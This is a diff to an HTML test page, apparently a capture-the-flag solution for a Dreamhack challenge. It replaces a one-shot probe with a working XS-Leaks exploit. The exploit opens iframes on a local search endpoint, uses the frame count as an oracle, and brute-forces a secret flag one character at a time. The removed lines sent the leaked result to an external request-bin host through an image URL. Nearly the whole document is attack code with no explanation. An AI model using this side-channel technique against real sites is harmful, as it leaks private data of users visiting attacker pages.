--- a/static/js/test.html
+++ b/static/js/test.html
@@ -1,12 +1,49 @@
 <iframe id="iframe"></iframe>
 <img id="img">
 <script>
-	let iframe = document.createElement("iframe");
-	iframe.src = "http://127.0.0.1:8000/search?query=DH{";
-	document.body.appendChild(iframe);
-	iframe.onload = ()=>{
-		result = iframe.contentWindow.frames.length;
-		console.log(result);
-		img.src = `https://uglumaa.request.dreamhack.games/${result}`;
-	};
+    async function search(query){
+        return new Promise((resolve, reject)=>{
+            let iframe = document.createElement("iframe");
+            iframe.src = "http://127.0.0.1:8000/search?query=" + query;
+            document.body.appendChild(iframe);
+
+            iframe.onload = () => {
+                try{
+                    result = iframe.contentWindow.frames.length;
+                    resolve(result > 0);
+                }
+                catch(e){
+                    reject(e);
+                }
+            };
+        });
+    }
+
+    async function exploit(){
+        let chars = "0123456789abcdef";
+        let secret = "DH{";
+
+        while(!secret.includes("}")){
+            let promise = chars.split("").map(c => search(secret + c).then(result => ({char: c, success: result})));
+            let results = await Promise.all(promise);
+
+            let found = false;
+
+            for (let rslt of results){
+                if(rslt.success){
+                    secret += rslt.char;
+                    found = true;
+                    break;
+                }
+            }
+
+            if(!found){
+                throw new Error("Not found");
+            }
+        }
+        
+        search("DH{");
+    }
+
+    exploit()
 </script>
